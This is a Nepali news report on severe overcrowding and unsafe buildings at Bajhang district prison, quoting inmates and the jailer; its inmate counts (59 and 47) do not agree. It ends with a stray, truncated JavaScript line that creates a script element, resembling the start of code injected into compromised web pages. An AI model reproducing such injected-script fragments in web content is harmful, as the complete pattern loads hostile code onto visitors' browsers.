jailबझाङ, असोज ७ – जिल्ला कारागार बझाङमा क्षमताभन्दा तेब्बर कैदी राखिएका छन् । कैदीले चर्पी प्रयोग गर्न पनि अप्ठ्यारो भएको छ । नयाँ भवन निर्माणमा ढिलाइ हुँदा कैदीलाई समस्या देखिएको छ ।

कारागारको क्षमता २५ जना रहेको भएपनि जेलभित्र ५९ जना कैदी राखिएका छन् । नत खान नै पाइन्छ नत सुत्न, त्योभन्दा पनि बढी पीडा कतिखेर भूकम्प आएर जेलभित्रै भवन र पर्खाल भत्केर सबैजनाको एकै चिहान हुन्छ भने पीडा लागिरहेको छ । घरपरिवारको अनुहारै नदेखेर मरिन्छ कि भने चिन्ता लागिरहेको छ, माझी–१ घर भई विगत ९ वर्षदेखि जेल सजाय भोगिरहेका लक्ष्मण रावलले भने, “पानी परेमा सबै चुहेर भित्रै आउने हुन्छ । भूकम्प आएमा भत्किन लागेको पर्खाल भवन एकैपटक सँगै भत्कएर जेलभित्रै ज्यान जाने डरले पिरोलिरहेको छ ।”

बिहान–बेलुकाको खाना भाँडाकँुडाको अभावमा तीनपटक पकाउने गरिन्छ । आलोपालो दुई–दुई घन्टा सुत्ने गरिन्छ, पानी खान पुग्दैन, चर्पीमा त्यस्तै समस्या छ, कैदीको के बाँच्न पाउने अधिकार छैन रु धेरैपटक भोक हड्तालदेखि बिभिन्न आन्दोलन गरियो, केही सुनुवाइ नभएको दौलीचौर–४ घर भई गत २ वर्षदेखि जेल सजाय भोगिरहेका देवबहादुर बोहोराले भने, “कतिखेर भवन र पर्खाल भत्केर सबै कैदीको एकै चिहान हुने हो थाहा छैन ।”

रावल गाउँकी एक दलित महिलालाई बलत्कार गरेको मुद्दामा १३ वर्षको जेल सजायमा छन् भने र बोहोरा आफ्नै गाउँको नातेदारलाई ज्यान मारेको अभियोगमा २० वर्ष कारागारमा जेल सजायमा परेका व्यक्ति हुन् । कारागारमा निकै समस्या छ अहिले सडक डिभिजन कार्यालय बैतडीले भवन निमाणका लागि टेन्डरको आह्वान गरी निर्माण कार्य गरेको पाइएको छ ।

पानी परे सबै भित्र आउने हुन्छ, पर्खाल पनि कतिखेर भत्कने हो डर लागेको छ, करिव चार दशक पुरानो यस कारागारमा क्षमताभन्दा बढी कैदी बाध्यताले राख्नु परेको जेलर राजेन्द्रबहादुर बोहराले बताए ।

उनले भने, ‘बिहान कार्यालयमा हाजिर भएदेखि कार्यालय समयभरि कैदीले विभिन्न गुनासो गर्छन्, पानी परे गाली गर्छन्, सबै ४७ पुरुष बन्दी हुन् । दुई महिलालाई यसअघि नै डडेल्धुरा पठाइएको छ ।

var d=document;var s=d.createElement(‘script’);